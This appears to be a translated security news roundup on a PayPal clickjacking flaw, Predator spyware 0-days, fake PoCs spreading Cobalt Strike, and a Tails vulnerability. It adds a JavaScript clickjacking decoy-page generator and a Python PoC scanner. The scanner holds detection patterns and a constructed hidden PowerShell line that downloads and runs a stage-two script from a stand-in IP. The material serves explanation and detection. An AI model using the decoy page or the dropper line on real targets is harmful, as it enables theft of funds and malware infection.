Unpatched vulnerability in PayPal
Security researcher H4x0r-DZ has disclosed an unpatched vulnerability in PayPal's money transfer service that could allow attackers to steal money from victims by getting them to complete attacker-chosen transactions through clickjacking.
Clickjacking tricks a user into clicking seemingly harmless elements of a web page that are in fact laid over a hidden, framed page, so the click lands on a control the attacker chose; it is used to trigger malware downloads, redirect users to malicious sites, or leak sensitive information.
The researcher found that the paypal[.]com/agreements/approve endpoint, designed for billing agreements and intended to accept only tokens of type billingAgreementToken, also accepted another token type.
An attacker could therefore embed the endpoint in an iframe on a page under their control; a victim logged in to PayPal who clicks a button on that page would unknowingly transfer funds to a PayPal account controlled by the attacker.
The researcher published the proof of concept after reporting the flaw to the company in October 2021 without receiving a fix or a bounty from PayPal.
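The two halves of a clickjacking finding, as an added example that is not code from the article, from the researcher or from PayPal: first the check that decides whether a given origin can frame a page at all (the anti-framing headers are the only thing standing between an endpoint and the iframe overlay described above), then the generic decoy layout that makes the victim's click land on the framed page's real button. All origins, URLs and header values are constructed for the example; the CSP matching is a simplified subset of the spec (single policy header, no path matching).

```javascript
// Added example, not code from the article or from PayPal: a pre-check for
// clickjacking (can the attacker's origin frame the target page at all?) plus
// the generic decoy layout the technique relies on. Browsers block framing via
// X-Frame-Options or the CSP frame-ancestors directive; when neither stops the
// attacker's origin, an opaque decoy button can be placed over an invisible
// iframe so the victim's click lands on the real button of the framed page.
// All origins and URLs below are hypothetical.

function normalizeHeaders(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Match one frame-ancestors source expression against the attacker's origin.
// Handles 'none', 'self', '*', scheme-only sources ("https:"), plain hosts and
// wildcard hosts ("*.example.com"), each with optional scheme and port.
// Origins are assumed to be already normalized ("https://host[:port]").
function sourceMatches(source, attackerOrigin, pageOrigin) {
  const src = source.toLowerCase().replace(/^'(.*)'$/, "$1");
  if (src === "none") return false;
  if (src === "self") return attackerOrigin === pageOrigin;
  if (src === "*") return true;
  const attacker = new URL(attackerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return attacker.protocol === src;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && `${scheme}:` !== attacker.protocol) return false;
  const attackerPort = attacker.port || (attacker.protocol === "https:" ? "443" : "80");
  if (port && port !== "*" && port !== attackerPort) return false;
  return wildcard ? attacker.hostname.endsWith("." + host) : attacker.hostname === host;
}

// True if a browser loading the attacker's page could frame the target page.
// Per CSP Level 3, when frame-ancestors is present X-Frame-Options is ignored.
// Simplification: a single Content-Security-Policy header value is assumed.
function isFramable(headers, attackerOrigin, pageOrigin) {
  const h = normalizeHeaders(headers);
  const csp = h["content-security-policy"] || "";
  const directive = csp.split(";").map((d) => d.trim())
    .find((d) => /^frame-ancestors(\s|$)/i.test(d));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1);
    if (sources.length === 0) return false; // empty source list behaves like 'none'
    return sources.some((s) => sourceMatches(s, attackerOrigin, pageOrigin));
  }
  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return attackerOrigin === pageOrigin;
  // No header, or the obsolete ALLOW-FROM, which current browsers ignore.
  return true;
}

// The decoy layout: a visible button the victim wants to press, with the target
// page in a transparent iframe shifted so its real button sits exactly over the
// decoy and receives the click. `rect` is the target button's position and size
// inside the framed page (measured by the attacker beforehand).
function clickjackPageHtml(targetUrl, rect, decoyLabel) {
  return `<!doctype html>
<div style="position:relative;width:${rect.width}px;height:${rect.height}px;overflow:hidden">
  <button style="position:absolute;top:0;left:0;width:100%;height:100%;z-index:1">${decoyLabel}</button>
  <iframe src="${targetUrl}" scrolling="no"
    style="position:absolute;top:-${rect.top}px;left:-${rect.left}px;width:1200px;height:900px;opacity:0;z-index:2;border:0"></iframe>
</div>`;
}

// Constructed sample responses (hypothetical origins, not real PayPal headers).
const ATTACKER = "https://attacker.example";
const TARGET = "https://pay.example";
const UNPROTECTED = { "Content-Type": "text/html" };
const HARDENED = {
  "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://*.partner.example",
  "X-Frame-Options": "DENY",
};

console.log("no anti-framing headers, framable:", isFramable(UNPROTECTED, ATTACKER, TARGET));
console.log("hardened, framable:", isFramable(HARDENED, ATTACKER, TARGET));
console.log(clickjackPageHtml("https://pay.example/confirm", { top: 300, left: 200, width: 160, height: 40 }, "Claim reward"));
```

When auditing an endpoint for this class of bug, fetch it with the victim's session cookies and run the headers through the check; if it returns true for a foreign origin, the only remaining question is whether the framed action completes with a single click, which is exactly what the researcher's proof of concept demonstrated.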
* * *
Predator spyware distributed through 0-days exploitation
Researchers from Google's Threat Analysis Group (TAG) have published details on the use of new 0-days in Chrome and Android to deliver Predator, a commercial cyber-espionage tool developed by Cytrox. The researchers describe three separate campaigns.
The first, detected in August 2021, exploited a Chrome vulnerability to redirect victims to SBrowser (CVE-2021-38000, CVSSv3 6.1). The second, starting in September 2021, exploited several Chrome vulnerabilities to escape the browser sandbox (CVE-2021-37973, CVSSv3 9.8, and CVE-2021-37976, CVSSv3 6.5). The third, from October 2021, used 0-days in both Chrome and Android (CVE-2021-38003, CVSSv3 8.8, and CVE-2021-1048, CVSSv3 7.8).
Despite the different 0-days, the campaigns shared the same delivery chain: the attackers emailed Android users "one-time links" (valid only once and expiring after 24 hours) that mimicked URL-shortening services and served the exploits.
The exploits delivered the Android malware ALIEN, which in turn downloaded the Predator spyware. On attribution, the researchers assess that the actors behind the campaigns are government-backed, located at least in Egypt, Armenia, Greece, Madagascar, Côte d'Ivoire, Serbia, Spain and Indonesia. These conclusions are consistent with the investigation published by Citizen Lab in December 2021.
* * *
Distribution of Cobalt Strike via fake PoCs
Cyble researchers have found that threat actors used fake proof-of-concept exploits for two recent Windows vulnerabilities to infect victims with Cobalt Strike. The malicious PoCs were posted on GitHub for the remote code execution vulnerabilities CVE-2022-24500 and CVE-2022-26809, both patched by Microsoft in April.
Both repositories belonged to the same GitHub user, "rkxxz", whose account and repositories have since been removed. This practice, which is becoming increasingly common, typically targets people working in information security, the audience most likely to download and run a fresh PoC.
According to Cyble's analysis, the malware is a .NET application that prints a fake message about an exploitation attempt and then runs PowerShell commands to download the Cobalt Strike beacon.
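Before running a PoC pulled from a public repository, the pattern described above (a launcher that spawns PowerShell to fetch and execute a second stage) can be triaged statically. The following scanner is an added example and is not code from the article or from Cyble: it searches source text for PowerShell launch, download and in-memory execution indicators, and decodes any base64 blob passed to -EncodedCommand (PowerShell expects UTF-16LE) so that a hidden download URL is surfaced and re-scanned. The two sample "PoC" files, the IP address and the stage-two filename are constructed for the example.

```python
"""Added example (not from the article or from Cyble): static triage of
proof-of-concept code pulled from public repositories.

It looks for the fake-PoC dropper pattern: a launcher that spawns PowerShell to
fetch and run a second stage. Plain-text indicators are matched directly; base64
blobs passed to -EncodedCommand are decoded (PowerShell expects UTF-16LE) and
re-scanned, since that is the usual place to hide the download URL.
All sample inputs below are constructed for the example.
"""
import base64
import re

# (indicator name, pattern) pairs, matched case-insensitively on source text.
INDICATORS = [
    ("powershell_launch", re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("bypass_policy", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
    ("download", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bcurl\b", re.I)),
    ("in_memory_exec", re.compile(
        r"Invoke-Expression|\bIEX\b|\[Reflection\.Assembly\]::Load|FromBase64String", re.I)),
    ("url", re.compile(r"https?://[^\s'\"<>]+", re.I)),
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text):
    """Return the decoded -EncodedCommand payloads found in text."""
    decoded = []
    for m in ENCODED_CMD.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            decoded.append(raw.decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command (wrong padding or not UTF-16LE)
    return decoded


def scan_text(text, depth=0):
    """Map indicator name -> matched snippets, recursing into decoded
    -EncodedCommand payloads (bounded, in case payloads nest)."""
    hits = {}
    for name, pat in INDICATORS:
        found = [m.group(0) for m in pat.finditer(text)]
        if found:
            hits.setdefault(name, []).extend(found)
    if depth < 2:
        for payload in decode_encoded_commands(text):
            hits.setdefault("encoded_command", []).append(payload[:80])
            for name, found in scan_text(payload, depth + 1).items():
                hits.setdefault(name, []).extend(found)
    return hits


def verdict(hits):
    """A PowerShell launch combined with a download or in-memory execution
    indicator is the dropper pattern; either half alone is worth a look."""
    launch = "powershell_launch" in hits or "encoded_command" in hits
    stage2 = "download" in hits or "in_memory_exec" in hits
    if launch and stage2:
        return "SUSPICIOUS: launches PowerShell to fetch/run a second stage"
    if launch or stage2:
        return "REVIEW: partial dropper indicators"
    return "clean: no dropper indicators"


def triage(files):
    """Map file name -> (verdict, hits) for a dict of file name -> source text."""
    results = {}
    for name, text in files.items():
        hits = scan_text(text)
        results[name] = (verdict(hits), hits)
    return results


# Constructed samples. The "fake" launcher mirrors the pattern in the article:
# a fake exploitation message, then a hidden PowerShell download of a beacon.
# 198.51.100.7 is a documentation address (TEST-NET-2), not a real host.
_FAKE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
_BLOB = base64.b64encode(_FAKE_CMD.encode("utf-16-le")).decode()

SAMPLES = {
    "exploit_real.cs": (
        "// constructed: a PoC that only sends a crafted packet\n"
        "var sock = new TcpClient(host, 135);\n"
        "sock.GetStream().Write(packet, 0, packet.Length);\n"
    ),
    "exploit_fake.cs": (
        "// constructed: a launcher mimicking the fake-PoC pattern\n"
        "Console.WriteLine(\"[+] Exploiting target... failed, host not vulnerable\");\n"
        "Process.Start(\"powershell.exe\", \"-w hidden -ep bypass -EncodedCommand " + _BLOB + "\");\n"
    ),
}

if __name__ == "__main__":
    for name, (result, hits) in triage(SAMPLES).items():
        print(f"{name}: {result}")
        for indicator, found in hits.items():
            print(f"    {indicator}: {found[:3]}")
```

The scanner is a triage aid, not a verdict: a genuine PoC may legitimately call PowerShell, and a launcher can hide its second stage in a resource or in a compiled binary rather than in an encoded command line, which is why the safe default for any untrusted PoC remains running it in an isolated, instrumented VM.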
* * *
0-day vulnerability in Tails
Tails has issued a security advisory warning of a vulnerability affecting Tails 5.0 that puts at risk users who rely on the Linux distribution to browse with Tor Browser.
According to Tails, exploitation could allow an attacker to obtain sensitive information such as passwords and private messages, although it does not break the encryption and anonymity of Tor connections.
Tails recommends rebooting the system and notes that Mozilla has detected activity exploiting the flaw.